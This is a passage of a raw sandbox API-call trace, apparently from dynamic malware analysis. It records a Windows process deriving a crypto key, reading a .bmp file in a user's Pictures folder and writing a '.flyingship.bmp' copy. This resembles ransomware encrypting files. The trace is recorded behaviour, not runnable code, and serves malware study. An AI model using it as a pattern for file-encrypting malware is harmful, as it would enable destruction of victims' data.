wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.864] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0188.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.864] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.878] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0188.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0188.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.879] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.879] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0188.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.879] CryptDestroyHash (hHash=0x90ae18) returned 1 [0188.879] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0188.879] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\6t126znrjjemieiaf23.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.881] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.881] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0188.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0188.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0188.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0188.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.882] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0188.882] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.882] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.883] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0188.884] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat")) returned 0x10 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.884] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0188.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0188.884] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.885] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0188.885] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\6t126znrjjemieiaf23.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0188.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0188.888] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0188.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0188.889] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0188.889] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x80da, lpOverlapped=0x0) returned 1 [0188.891] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0188.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0188.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80da) returned 0xbea018 [0188.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0188.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0188.893] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0188.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80da) returned 0xbf2100 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80da) returned 0xbea018 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0188.894] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.894] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.894] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0188.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0188.895] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.895] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0188.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80da) returned 0xbea018 [0188.895] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.895] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0188.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0188.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2618 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0188.896] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0188.896] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80da) returned 0xbfa1e8 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.897] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) 